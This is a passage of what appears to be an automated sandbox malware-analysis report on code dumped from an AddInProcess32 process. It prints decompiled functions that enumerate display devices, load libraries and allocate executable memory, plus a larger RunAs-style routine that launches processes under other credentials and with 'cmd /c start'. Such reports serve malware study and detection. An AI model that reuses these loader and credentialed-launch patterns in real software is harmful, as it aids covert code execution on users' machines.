Opcode Fuzzy Hash: 8db0a9dd6af13a53eee8f2e293350d40a5596e0dc37122c688ebc00219d0ab0f
Instruction Fuzzy Hash: 1AF04475D94328ABD610AFB49C49B6A37BCDF04289F180894B906DB240EA74D4508F20

Uniqueness

Uniqueness Score: -1.00%

Function 02B52FD4 Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 21%

			E02B52FD4(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				char _v432;
				long _v436;
				struct _DISPLAY_DEVICEA _v860;
				signed int _t11;
				char* _t22;
				char* _t27;
				void* _t39;
				signed int _t41;

				_t43 = (_t41 & 0xfffffff8) - 0x35c;
				_t11 =  *0x2b56004; // 0xbb40e64e
				_v8 = _t11 ^ (_t41 & 0xfffffff8) - 0x0000035c;
				_t27 = __ecx;
				_v436 = 0x1a8;
				_push(0);
				_push( &_v436);
				_push(0);
				_t39 = 0;
				_push(0);
				while(EnumDisplayDevicesA() != 0) {
					E02B52CE7(_t14,  &_v860, 0x1a8);
					_v860.cb = 0x1a8;
					if(EnumDisplayDevicesA( &_v432, 0,  &_v860, 0) == 0) {
						L3:
						GetLastError();
						_push(0);
						_t39 = _t39 + 1;
						_push( &_v436);
						_push(_t39);
						_push(0);
						continue;
					} else {
						_t22 = StrStrA( &(_v860.DeviceID), _t27); // executed
						if(_t22 == 0) {
							goto L3;
						}
					}
					break;
				}
				return E02B53C33(_v12 ^ _t43);
			}

0x02b52fda
0x02b52fe0
0x02b52fe7
0x02b52ffe
0x02b53000
0x02b5300d
0x02b5300e
0x02b5300f
0x02b53010
0x02b53012
0x02b5306a
0x02b5301e
0x02b5302a
0x02b53041
0x02b53056
0x02b53056
0x02b5305c
0x02b53065
0x02b53066
0x02b53067
0x02b53068
0x00000000
0x02b53043
0x02b5304c
0x02b53054
0x00000000
0x00000000
0x02b53054
0x00000000
0x02b53041
0x02b53084

APIs

EnumDisplayDevicesA.USER32(?,00000000,?,00000000), ref: 02B5303D
StrStrA.KERNELBASE(?,?), ref: 02B5304C
GetLastError.KERNEL32 ref: 02B53056
EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 02B5306A

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: DevicesDisplayEnum$ErrorLast
String ID:
API String ID: 2855626068-0
Opcode ID: e8445ef92b0d0f6d22d70e45a758134cc488de82347c465936d899295f94b6dd
Instruction ID: 3360150db0bf5159a6aecf5797f8acb0d88d5e8f114bed5db27d0a6bb54e9a68
Opcode Fuzzy Hash: e8445ef92b0d0f6d22d70e45a758134cc488de82347c465936d899295f94b6dd
Instruction Fuzzy Hash: 4F11CE71A58354ABE3609B64DC45FEB73ECEF84791F04096DA949CA180EB70A904CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 01380570 Relevance: 1.6, APIs: 1, Instructions: 128
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00000000,00000000,?,?,?,?,00000000), ref: 013806A0

Memory Dump Source

Source File: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1380000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e937006d0eac38888625c5fba067e9f893380eca7e5b8aa9e88496690ea0c380
Instruction ID: 29651db6f21e1dc7e5a824a02163724dd5bb7c1d46e4515f6b3a7b63ffcef279
Opcode Fuzzy Hash: e937006d0eac38888625c5fba067e9f893380eca7e5b8aa9e88496690ea0c380
Instruction Fuzzy Hash: 055180B4E00209EFDB48DF98D890BADBBB5FF48318F14815AE919A7351D730A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01380700 Relevance: 1.4, APIs: 1, Instructions: 129
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,013809F4,00001000,00000040), ref: 01380759

Memory Dump Source

Source File: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1380000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b02edd85b4b2e0ba4da0d4ead806a640de917280d28bcf58c2f3eec5a6372bc3
Instruction ID: 7605dafe9dce02513b7ad03750b69aba366e3239da7ce84bd9beab4616c8ac60
Opcode Fuzzy Hash: b02edd85b4b2e0ba4da0d4ead806a640de917280d28bcf58c2f3eec5a6372bc3
Instruction Fuzzy Hash: C9516DB4E00209EFCB08DF98D591AEDBBB5BF48318F144099E915AB351D731AA94CFA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402050 Relevance: 109.1, APIs: 43, Strings: 19, Instructions: 573
windowprocesssleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00402050(struct HINSTANCE__* __ecx, intOrPtr __edx, void* __eflags, void* _a4) {
				signed int _v8;
				signed int _v12;
				short _v1052;
				char _v2082;
				char _v2084;
				char _v2762;
				char _v2764;
				char _v3282;
				char _v3284;
				char _v3802;
				char _v3804;
				struct _STARTUPINFOW _v3876;
				short _v3900;
				short _v3904;
				char _v3944;
				struct HWND__* _v3948;
				struct _WNDCLASSEXW _v4024;
				struct _PROCESS_INFORMATION _v4040;
				struct HWND__* _v4044;
				intOrPtr _v4048;
				intOrPtr _v4052;
				intOrPtr _v4056;
				char _v4060;
				void* _v4064;
				char _v4068;
				void* _v4072;
				char _v4073;
				intOrPtr _v4080;
				void* _v4081;
				struct HWND__* _v4088;
				intOrPtr _v4092;
				void* _v4096;
				void* _v4100;
				void* _v4104;
				void* _v4132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t183;
				void* _t193;
				void* _t199;
				intOrPtr _t201;
				void* _t203;
				void* _t205;
				void* _t208;
				void* _t210;
				void* _t211;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t218;
				void* _t220;
				void* _t227;
				void* _t229;
				void* _t230;
				void* _t237;
				void* _t238;
				intOrPtr _t239;
				int _t240;
				short _t244;
				struct HWND__* _t245;
				void* _t247;
				signed int _t248;
				struct HWND__* _t251;
				void* _t252;
				short _t253;
				struct HWND__* _t255;
				void* _t257;
				void* _t258;
				void* _t272;
				void* _t274;
				void* _t275;
				intOrPtr _t333;
				void* _t339;
				intOrPtr _t340;
				struct HINSTANCE__* _t344;
				struct HWND__* _t345;
				void* _t346;
				void* _t352;
				signed int _t353;
				signed int _t354;
				signed int _t356;
				signed int _t361;
				void* _t362;
				void* _t363;
				void* _t364;
				void* _t365;
				void* _t367;

				_t356 = (_t354 & 0xfffffff8) - 0xff4;
				_t183 =  *0x413004; // 0x98fc836b
				_v8 = _t183 ^ _t356;
				_t333 = __edx;
				_t344 = __ecx;
				_v4080 = __edx;
				_v4088 = 0;
				_v2764 = 0;
				E00409280(__edx,  &_v2762, 0, 0x2a2);
				_v2084 = 0;
				E00409280(_t333,  &_v2082, 0, 0x402);
				_v3284 = 0;
				E00409280(_t333,  &_v3282, 0, 0x200);
				_v3804 = 0;
				E00409280(_t333,  &_v3802, 0, 0x206);
				_v3948 = 0;
				E00409280(_t333,  &_v3944, 0, 0x40);
				_v4060 = 0;
				_v4068 = 0;
				_v4044 = 0;
				_v4072 = 0;
				_v4081 = 0;
				_v4073 = 0;
				_t361 = _t356 + 0x3c;
				_v4056 = 0;
				_v4052 = 0;
				_v4048 = 0;
				_t193 = E00401800(_t333,  &_a4, _t344);
				_t272 = _a4;
				if(_t272 < 2) {
					L96:
					_v4024.cbSize = 0x30;
					_v4024.style = 3;
					_v4024.lpfnWndProc = E00401D50;
					_v4024.cbClsExtra = 0;
					_v4024.cbWndExtra = 0x1e;
					_v4024.hInstance = _t344;
					_v4024.hIcon = LoadIconW(_t344, L"ICON");
					_v4024.hIconSm.hwnd = LoadIconW(_t344, L"ICON");
					_v4024.hCursor = LoadCursorW(0, 0x7f00);
					_v4024.hbrBackground = 0x10;
					_v4024.lpszMenuName = 0;
					_v4024.lpszClassName = L"SHELLRUNAS";
					RegisterClassExW( &_v4024);
					_t345 = CreateDialogParamW(_t344, L"AboutUsage", 0, E00401D50, 0);
					_t199 = GetMessageW( &(_v4024.hIconSm), 0, 0, 0);
					__eflags = _t199;
					if(_t199 == 0) {
						L100:
						_v4092 = 0x57;
						L101:
						LocalFree(_v4072);
						_t201 = _v4092;
						_pop(_t346);
						_pop(_t274);
						E0040318A(_t201, _t274, _v12 ^ _t361, _t346);
						return _t201;
					} else {
						goto L97;
					}
					do {
						L97:
						_t203 = IsDialogMessageW(_t345,  &(_v4024.hIconSm));
						__eflags = _t203;
						if(_t203 == 0) {
							TranslateMessage( &(_v4024.hIconSm));
							DispatchMessageW( &(_v4024.hIconSm));
						}
						_t205 = GetMessageW( &(_v4024.hIconSm), 0, 0, 0);
						__eflags = _t205;
					} while (_t205 != 0);
					goto L100;
				}
				_t339 = _v4080 + 4;
				_v4064 = _t339;
				_t208 = E0040346A(_t193,  *(_v4080 + 4), L"/?");
				_t361 = _t361 + 8;
				if(_t208 == 0) {
					goto L96;
				}
				_t210 = E0040346A( *_t339,  *_t339, L"/raw");
				_t362 = _t361 + 8;
				if(_t210 != 0) {
					_t312 =  *_t339;
					_t211 = E0040346A(_t210,  *_t339, L"/reg");
					_t363 = _t362 + 8;
					__eflags = _t211;
					if(_t211 != 0) {
						_t213 = E0040346A( *_t339,  *_t339, L"/regnetonly");
						_t364 = _t363 + 8;
						__eflags = _t213;
						if(_t213 != 0) {
							_t285 =  *_t339;
							_t214 = E0040346A(_t213,  *_t339, L"/unreg");
							_t365 = _t364 + 8;
							__eflags = _t214;
							if(_t214 != 0) {
								_t215 = E0040346A(_t214,  *_t339, L"/netonly");
								_t362 = _t365 + 8;
								__eflags = _t215;
								if(_t215 == 0) {
									__eflags = _t272 - 2;
									_v4072 = 1;
									if(_t272 > 2) {
										_t352 = _v4080 + 8;
										__eflags = _t352;
										memcpy(_t339, _t352, _t272 - 2 << 2);
										_t362 = _t362 + 0xc;
										_t339 = _v4064;
									}
									__eflags = _t272;
								}
								L28:
								E004036E5( *_t339,  &_v3804, 0x104,  *_t339);
								_t218 = E004029C0( *_t339, __eflags,  &_v3804);
								_t367 = _t362 + 0x10;
								__eflags = _t218;
								_v4088 = _t218;
								if(__eflags == 0) {
									_push( &_v4068);
									_push(_v4072);
									_push(_v4080);
									_t220 = E00402F60(_t272,  &_v4073,  &_v3804, __eflags);
									_t361 = _t367 + 0xc;
									__eflags = _t220;
									_v4088 = _t220;
									if(_t220 != 0) {
										goto L101;
									} else {
										goto L31;
									}
									while(1) {
										L31:
										E00409280(_t339,  &_v2084, 0, 0x202);
										E00409280(_t339,  &_v2764, 0, 0x152);
										E00409280(_t339,  &_v3284, 0, 0x101);
										_push(_v4088);
										_push( &_v3284);
										_push( &_v2084);
										_push(_v4072);
										_t339 =  &_v2764;
										_t227 = E00402CB0( *_v4064, _t339, __eflags);
										_t361 = _t361 + 0x34;
										__eflags = _t227;
										_v4088 = _t227;
										if(_t227 != 0) {
											goto L101;
										}
										_t275 = _v4072;
										__eflags = _t275;
										_t229 =  &_v3284;
										_v3948 = 0x44;
										_v3904 = 1;
										_v3900 = 1;
										__imp__CreateProcessWithLogonW( &_v2084, _t339, _t229, (0 | _t275 != 0x00000000) + 1, 0, _v4068, 0, 0, 0,  &_v3948,  &_v4060);
										__eflags = _t229;
										if(_t229 != 0) {
											__eflags = _t275;
											if(_t275 == 0) {
												L37:
												__eflags = _v4132 - 0x52e;
												if(_v4132 == 0x52e) {
													continue;
												}
												__eflags = _v4132 - 0x8007052e;
												if(_v4132 == 0x8007052e) {
													continue;
												}
												__eflags = _v4132 - 0xc000006d;
												if(_v4132 == 0xc000006d) {
													continue;
												}
												__eflags = _v4132 - 0xd000006d;
												if(_v4132 == 0xd000006d) {
													continue;
												}
												__eflags = _v4132 - 5;
												if(_v4132 == 5) {
													continue;
												}
												__eflags = _v4132 - 0x80070005;
												if(_v4132 == 0x80070005) {
													continue;
												}
												__eflags = _v4132 - 0xc0000022;
												if(_v4132 == 0xc0000022) {
													continue;
												}
												__eflags = _v4132 - 0xd0000022;
												if(_v4132 == 0xd0000022) {
													continue;
												}
												__eflags = _v4132 - 0x56;
												if(_v4132 == 0x56) {
													continue;
												}
												__eflags = _v4132 - 0x80070056;
												if(_v4132 == 0x80070056) {
													continue;
												}
												__eflags = _v4132 - 0xc000006a;
												if(_v4132 == 0xc000006a) {
													continue;
												}
												__eflags = _v4132 - 0xd000006a;
												if(_v4132 == 0xd000006a) {
													continue;
												}
												__eflags = _v4132 - 0x8009030e;
												if(_v4132 == 0x8009030e) {
													continue;
												}
												__eflags = _v4132 - 0x8009030c;
												if(_v4132 == 0x8009030c) {
													continue;
												}
												__eflags = _v4132 - 0x4f1;
												if(_v4132 == 0x4f1) {
													continue;
												}
												__eflags = _v4132 - 0x800704f1;
												if(_v4132 == 0x800704f1) {
													continue;
												}
												__eflags = _v4132 - 0xc0000388;
												if(_v4132 == 0xc0000388) {
													continue;
												}
												__eflags = _v4132 - 0xd0000388;
												if(_v4132 == 0xd0000388) {
													continue;
												}
												__eflags = _v4132 - 0x532;
												if(_v4132 == 0x532) {
													continue;
												}
												__eflags = _v4132 - 0x80070532;
												if(_v4132 == 0x80070532) {
													continue;
												}
												__eflags = _v4132 - 0xc0000071;
												if(_v4132 == 0xc0000071) {
													continue;
												}
												__eflags = _v4132 - 0xd0000071;
												if(_v4132 == 0xd0000071) {
													continue;
												}
												__eflags = _v4132 - 0x773;
												if(_v4132 == 0x773) {
													continue;
												}
												__eflags = _v4132 - 0x80070773;
												if(_v4132 == 0x80070773) {
													continue;
												}
												__eflags = _v4132 - 0xc0000224;
												if(_v4132 == 0xc0000224) {
													continue;
												}
												__eflags = _v4132 - 0xd0000224;
												if(_v4132 == 0xd0000224) {
													continue;
												}
												__eflags = _v4132 - 0x8c2;
												if(_v4132 == 0x8c2) {
													continue;
												}
												__eflags = _v4132 - 0x800708c2;
												if(_v4132 == 0x800708c2) {
													continue;
												}
												__eflags = _v4132 - 0x78f;
												if(_v4132 == 0x78f) {
													continue;
												}
												__eflags = _v4132 - 0x8007078f;
												if(_v4132 == 0x8007078f) {
													continue;
												}
												__eflags = _v4132 - 0xc0000413;
												if(_v4132 == 0xc0000413) {
													continue;
												}
												__eflags = _v4132 - 0xd0000413;
												if(_v4132 == 0xd0000413) {
													continue;
												}
												__eflags = _v4132 - 0x533;
												if(_v4132 == 0x533) {
													continue;
												}
												__eflags = _v4132 - 0x80070533;
												if(_v4132 == 0x80070533) {
													continue;
												}
												__eflags = _v4132 - 0xc0000072;
												if(_v4132 == 0xc0000072) {
													continue;
												}
												__eflags = _v4132 - 0xd0000072;
												if(_v4132 == 0xd0000072) {
													continue;
												}
												__eflags = _v4132 - 0x52f;
												if(_v4132 == 0x52f) {
													continue;
												}
												__eflags = _v4132 - 0x8007052f;
												if(_v4132 == 0x8007052f) {
													continue;
												}
												__eflags = _v4132 - 0xc000006e;
												if(_v4132 == 0xc000006e) {
													continue;
												}
												__eflags = _v4132 - 0xd000006e;
												if(_v4132 == 0xd000006e) {
													continue;
												}
												__eflags = _v4132 - 0x775;
												if(_v4132 == 0x775) {
													continue;
												}
												__eflags = _v4132 - 0x80070775;
												if(_v4132 == 0x80070775) {
													continue;
												}
												__eflags = _v4132 - 0xc0000234;
												if(_v4132 == 0xc0000234) {
													continue;
												}
												__eflags = _v4132 - 0xd0000234;
												if(_v4132 == 0xd0000234) {
													continue;
												}
												__eflags = _v4132 - 0x701;
												if(_v4132 == 0x701) {
													continue;
												}
												__eflags = _v4132 - 0x80070701;
												if(_v4132 == 0x80070701) {
													continue;
												}
												__eflags = _v4132 - 0xc0000193;
												if(_v4132 == 0xc0000193) {
													continue;
												}
												__eflags = _v4132 - 0xd0000193;
												if(_v4132 == 0xd0000193) {
													continue;
												}
												__eflags = _v4132 - 0x569;
												if(_v4132 == 0x569) {
													continue;
												}
												__eflags = _v4132 - 0x80070569;
												if(_v4132 == 0x80070569) {
													continue;
												}
												__eflags = _v4132 - 0xc000015b;
												if(_v4132 == 0xc000015b) {
													continue;
												}
												_t230 = _v4132;
												__eflags = _t230 - 0xd000015b;
												if(_t230 == 0xd000015b) {
													continue;
												}
												__eflags = _t230;
												if(_t230 == 0) {
													L95:
													CloseHandle(_v4104);
													CloseHandle(_v4100);
													goto L101;
												}
												E00401880(L"Error launching application", _t230);
												_t361 = _t361 + 4;
												goto L101;
											}
											E00403926( &(_v3876.dwYSize), 0x104);
											_t237 = E0040360D( &(_v3876.dwYSize), L"cmd.exe");
											_t361 = _t361 + 0x10;
											__eflags = _t237;
											if(_t237 != 0) {
												goto L37;
											}
											_t238 = EnumWindows(E00402000,  &_v4096);
											__eflags = _t238;
											if(_t238 != 0) {
												_t340 = _v4092;
												while(1) {
													__eflags = _v4100;
													if(_v4100 == 0) {
														goto L95;
													}
													_t239 = _t340;
													_t340 = _t340 + 1;
													__eflags = _t239 - 5;
													if(_t239 >= 5) {
														goto L95;
													}
													Sleep(0xa);
													_t240 = EnumWindows(E00402000,  &_v4100);
													__eflags = _t240;
													if(_t240 != 0) {
														continue;
													}
													goto L95;
												}
												goto L95;
											}
											goto L37;
										}
										_v4132 = GetLastError();
										goto L37;
									}
									goto L101;
								}
								E00401880(L"Error launching program", _t218);
								_t361 = _t367 + 4;
								goto L101;
							}
							__eflags = _t272 - 2;
							if(_t272 <= 2) {
								L22:
								_t244 = _v4081;
								L23:
								__eflags = _t244;
								_t245 = E00401930(_t285 & 0xffffff00 | _t244 == 0x00000000);
								_t361 = _t365 + 4;
								_v4088 = _t245;
								goto L101;
							}
							_t247 = E0040346A( *(_v4080 + 8),  *(_v4080 + 8), L"/quiet");
							_t365 = _t365 + 8;
							__eflags = _t247;
							_t244 = 1;
							if(_t247 == 0) {
								goto L23;
							}
							goto L22;
						}
						__eflags = _t272 - 2;
						if(_t272 <= 2) {
							L17:
							_t248 = _v4081;
							L18:
							__eflags = _t248;
							_t251 = E00401BA0(1, _t344, _t248, _t248 & 0xffffff00 | _t248 == 0x00000000);
							_t361 = _t364 + 4;
							_v4088 = _t251;
							goto L101;
						}
						_t252 = E0040346A(_t213,  *(_v4080 + 8), L"/quiet");
						_t364 = _t364 + 8;
						__eflags = _t252;
						_t248 = 1;
						if(_t252 == 0) {
							goto L18;
						}
						goto L17;
					}
					__eflags = _t272 - 2;
					if(_t272 <= 2) {
						L12:
						_t253 = _v4081;
						L13:
						__eflags = _t253;
						_t255 = E00401BA0(0, _t344, _t253, _t312 & 0xffffff00 | _t253 == 0x00000000);
						_t361 = _t363 + 4;
						_v4088 = _t255;
						goto L101;
					}
					_t257 = E0040346A(_v4080,  *(_v4080 + 8), L"/quiet");
					_t363 = _t363 + 8;
					__eflags = _t257;
					_t253 = 1;
					if(_t257 == 0) {
						goto L13;
					}
					goto L12;
				}
				_t353 = 2;
				if(_t272 <= 2) {
					goto L28;
				}
				_t258 = E0040346A(_t210,  *(_v4080 + 8), L"/netonly");
				_t362 = _t362 + 8;
				if(_t258 == 0) {
					_t30 = _t258 + 3; // 0x3
					_t353 = _t30;
					SetEnvironmentVariableW(L"__COMPAT_LAYER", L"RunAsInvoker");
				}
				if(_t272 <= _t353) {
					goto L28;
				}
				E00409280(_t339,  &(_v3876.lpReserved), 0, 0x40);
				_v4040.hProcess = 0;
				_v4040.hThread = 0;
				_v4040.dwProcessId = 0;
				_v4040.dwThreadId = 0;
				_v3876.cb = 0x44;
				_v3876.wShowWindow = 1;
				E004036E5(0,  &_v1052, 0x208, L"cmd /c start ");
				E0040366B( *((intOrPtr*)(_v4080 + _t353 * 4)),  &_v1052, 0x208,  *((intOrPtr*)(_v4080 + _t353 * 4)));
				_t361 = _t362 + 0x24;
				if(CreateProcessW(0,  &_v1052, 0, 0, 0, 0x8000000, 0, 0,  &_v3876,  &_v4040) == 0) {
					_v4088 = GetLastError();
				}
				goto L101;
			}

0x00402056
0x0040205c
0x00402063
0x0040207b
0x0040207f
0x00402081
0x00402085
0x00402089
0x00402091
0x004020a7
0x004020af
0x004020c5
0x004020cd
0x004020e3
0x004020eb
0x004020fe
0x00402105
0x0040210c
0x00402110
0x00402114
0x00402118
0x0040211c
0x00402120
0x00402126
0x0040212c
0x00402130
0x00402134
0x00402138
0x0040213d
0x00402143
0x00402881
0x0040288f
0x00402897
0x0040289f
0x004028a7
0x004028ab
0x004028b3
0x004028bf
0x004028cb
0x004028dd
0x004028e1
0x004028e9
0x004028ed
0x004028f5
0x0040291f
0x00402921
0x00402923
0x00402925
0x0040295e
0x0040295e
0x00402966
0x0040296b
0x00402978
0x0040297d
0x0040297e
0x00402981
0x00402989
0x00000000
0x00000000
0x00000000
0x00402927
0x00402927
0x0040292d
0x00402933
0x00402935
0x0040293c
0x00402947
0x00402947
0x00402958
0x0040295a
0x0040295a
0x00000000
0x00402927
0x00402150
0x00402159
0x0040215d
0x00402162
0x00402167
0x00000000
0x00000000
0x00402175
0x0040217a
0x0040217f
0x0040227f
0x00402287
0x0040228c
0x0040228f
0x00402291
0x004022d8
0x004022dd
0x004022e0
0x004022e2
0x00402321
0x00402329
0x0040232e
0x00402331
0x00402333
0x00402378
0x0040237d
0x00402380
0x00402382
0x00402384
0x00402387
0x0040238c
0x00402392
0x00402392
0x00402398
0x00402398
0x0040239a
0x0040239a
0x0040239e
0x0040239e
0x004023a1
0x004023b1
0x004023c3
0x004023c8
0x004023cb
0x004023cd
0x004023d1
0x004023f2
0x004023f3
0x004023f4
0x00402400
0x00402405
0x00402408
0x0040240a
0x0040240e
0x00000000
0x00000000
0x00000000
0x00000000
0x00402414
0x00402414
0x00402423
0x0040243a
0x00402451
0x0040245d
0x00402469
0x00402477
0x00402478
0x00402479
0x00402480
0x00402485
0x00402488
0x0040248a
0x0040248e
0x00000000
0x00000000
0x00402494
0x004024af
0x004024be
0x004024c7
0x004024df
0x004024e6
0x004024ee
0x004024f4
0x004024f6
0x00402504
0x00402506
0x0040254b
0x0040254b
0x00402553
0x00000000
0x00000000
0x00402559
0x00402561
0x00000000
0x00000000
0x00402567
0x0040256f
0x00000000
0x00000000
0x00402575
0x0040257d
0x00000000
0x00000000
0x00402583
0x00402588
0x00000000
0x00000000
0x0040258e
0x00402596
0x00000000
0x00000000
0x0040259c
0x004025a4
0x00000000
0x00000000
0x004025aa
0x004025b2
0x00000000
0x00000000
0x004025b8
0x004025bd
0x00000000
0x00000000
0x004025c3
0x004025cb
0x00000000
0x00000000
0x004025d1
0x004025d9
0x00000000
0x00000000
0x004025df
0x004025e7
0x00000000
0x00000000
0x004025ed
0x004025f5
0x00000000
0x00000000
0x004025fb
0x00402603
0x00000000
0x00000000
0x00402609
0x00402611
0x00000000
0x00000000
0x00402617
0x0040261f
0x00000000
0x00000000
0x00402625
0x0040262d
0x00000000
0x00000000
0x00402633
0x0040263b
0x00000000
0x00000000
0x00402641
0x00402649
0x00000000
0x00000000
0x0040264f
0x00402657
0x00000000
0x00000000
0x0040265d
0x00402665
0x00000000
0x00000000
0x0040266b
0x00402673
0x00000000
0x00000000
0x00402679
0x00402681
0x00000000
0x00000000
0x00402687
0x0040268f
0x00000000
0x00000000
0x00402695
0x0040269d
0x00000000
0x00000000
0x004026a3
0x004026ab
0x00000000
0x00000000
0x004026b1
0x004026b9
0x00000000
0x00000000
0x004026bf
0x004026c7
0x00000000
0x00000000
0x004026cd
0x004026d5
0x00000000
0x00000000
0x004026db
0x004026e3
0x00000000
0x00000000
0x004026e9
0x004026f1
0x00000000
0x00000000
0x004026f7
0x004026ff
0x00000000
0x00000000
0x00402705
0x0040270d
0x00000000
0x00000000
0x00402713
0x0040271b
0x00000000
0x00000000
0x00402721
0x00402729
0x00000000
0x00000000
0x0040272f
0x00402737
0x00000000
0x00000000
0x0040273d
0x00402745
0x00000000
0x00000000
0x0040274b
0x00402753
0x00000000
0x00000000
0x00402759
0x00402761
0x00000000
0x00000000
0x00402767
0x0040276f
0x00000000
0x00000000
0x00402775
0x0040277d
0x00000000
0x00000000
0x00402783
0x0040278b
0x00000000
0x00000000
0x00402791
0x00402799
0x00000000
0x00000000
0x0040279f
0x004027a7
0x00000000
0x00000000
0x004027ad
0x004027b5
0x00000000
0x00000000
0x004027bb
0x004027c3
0x00000000
0x00000000
0x004027c9
0x004027d1
0x00000000
0x00000000
0x004027d7
0x004027df
0x00000000
0x00000000
0x004027e5
0x004027ed
0x00000000
0x00000000
0x004027f3
0x004027fb
0x00000000
0x00000000
0x00402801
0x00402809
0x00000000
0x00000000
0x0040280f
0x00402813
0x00402818
0x00000000
0x00000000
0x0040281e
0x00402820
0x00402868
0x00402873
0x0040287a
0x00000000
0x0040287a
0x00402828
0x0040282d
0x00000000
0x0040282d
0x00402515
0x00402527
0x0040252c
0x0040252f
0x00402531
0x00000000
0x00000000
0x0040253d
0x00402543
0x00402545
0x0040283b
0x00402840
0x00402840
0x00402845
0x00000000
0x00000000
0x00402847
0x00402849
0x0040284b
0x0040284e
0x00000000
0x00000000
0x00402852
0x0040285e
0x00402864
0x00402866
0x00000000
0x00000000
0x00000000
0x00402866
0x00000000
0x00402840
0x00000000
0x00402545
0x004024fe
0x00000000
0x004024fe
0x00000000
0x00402414
0x004023d9
0x004023de
0x00000000
0x004023de
0x00402335
0x00402338
0x00402355
0x00402355
0x00402359
0x00402359
0x0040235f
0x00402364
0x00402367
0x00000000
0x00402367
0x00402347
0x0040234c
0x0040234f
0x00402351
0x00402353
0x00000000
0x00000000
0x00000000
0x00402353
0x004022e4
0x004022e7
0x00402304
0x00402304
0x00402308
0x00402308
0x00402310
0x00402315
0x00402318
0x00000000
0x00402318
0x004022f6
0x004022fb
0x004022fe
0x00402300
0x00402302
0x00000000
0x00000000
0x00000000
0x00402302
0x00402293
0x00402296
0x004022b3
0x004022b3
0x004022b7
0x004022b7
0x004022bf
0x004022c4
0x004022c7
0x00000000
0x004022c7
0x004022a5
0x004022aa
0x004022ad
0x004022af
0x004022b1
0x00000000
0x00000000
0x00000000
0x004022b1
0x00402185
0x0040218c
0x00000000
0x00000000
0x0040219f
0x004021a4
0x004021a9
0x004021b5
0x004021b5
0x004021b8
0x004021b8
0x004021c0
0x00000000
0x00000000
0x004021d2
0x004021ee
0x004021f6
0x004021fa
0x004021fe
0x00402202
0x0040220d
0x00402217
0x00402234
0x00402239
0x0040226a
0x00402276
0x00402276
0x00000000

APIs

_memset.LIBCMT ref: 00402091
_memset.LIBCMT ref: 004020AF
_memset.LIBCMT ref: 004020CD
_memset.LIBCMT ref: 004020EB
_memset.LIBCMT ref: 00402105

Part of subcall function 00401800: __wcsicmp.LIBCMT ref: 00401819
Part of subcall function 00401800: __wcsicmp.LIBCMT ref: 0040182E

__wcsicmp.LIBCMT ref: 0040215D
__wcsicmp.LIBCMT ref: 00402175
__wcsicmp.LIBCMT ref: 0040219F

Part of subcall function 0040346A: __wcsicmp_l.LIBCMT ref: 004034F0

SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,RunAsInvoker), ref: 004021B8
_memset.LIBCMT ref: 004021D2
_wcscpy_s.LIBCMT ref: 00402217
_wcscat_s.LIBCMT ref: 00402234
CreateProcessW.KERNEL32 ref: 00402262
GetLastError.KERNEL32(?,?,?,?,00000208,cmd /c start ), ref: 00402270
__wcsicmp.LIBCMT ref: 00402287
__wcsicmp.LIBCMT ref: 004022A5
__wcsicmp.LIBCMT ref: 004022D8
__wcsicmp.LIBCMT ref: 004022F6
__wcsicmp.LIBCMT ref: 00402329
__wcsicmp.LIBCMT ref: 00402347
__wcsicmp.LIBCMT ref: 00402378
_wcscpy_s.LIBCMT ref: 004023B1
_memset.LIBCMT ref: 00402423
_memset.LIBCMT ref: 0040243A
_memset.LIBCMT ref: 00402451
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000), ref: 004024EE
GetLastError.KERNEL32 ref: 004024F8

Part of subcall function 00403926: __wcslwr_s_l.LIBCMT ref: 00403930

EnumWindows.USER32(00402000,?), ref: 0040253D
Sleep.KERNEL32(0000000A), ref: 00402852
EnumWindows.USER32(00402000,00000000), ref: 0040285E
CloseHandle.KERNEL32(?), ref: 00402873
CloseHandle.KERNEL32(?), ref: 0040287A
LoadIconW.USER32 ref: 004028B7
LoadIconW.USER32(?,ICON), ref: 004028C3
LoadCursorW.USER32(00000000,00007F00), ref: 004028D2
RegisterClassExW.USER32 ref: 004028F5
CreateDialogParamW.USER32 ref: 00402908
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402921
IsDialogMessageW.USER32(00000000,?), ref: 0040292D
TranslateMessage.USER32(?), ref: 0040293C
DispatchMessageW.USER32 ref: 00402947
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402958
LocalFree.KERNEL32(?,?,AboutUsage,00000000,Function_00001D50,00000000,?,?,?,?,ICON), ref: 0040296B

Strings

AboutUsage, xrefs: 00402902
D, xrefs: 004024C7
/reg, xrefs: 00402281
/unreg, xrefs: 00402323
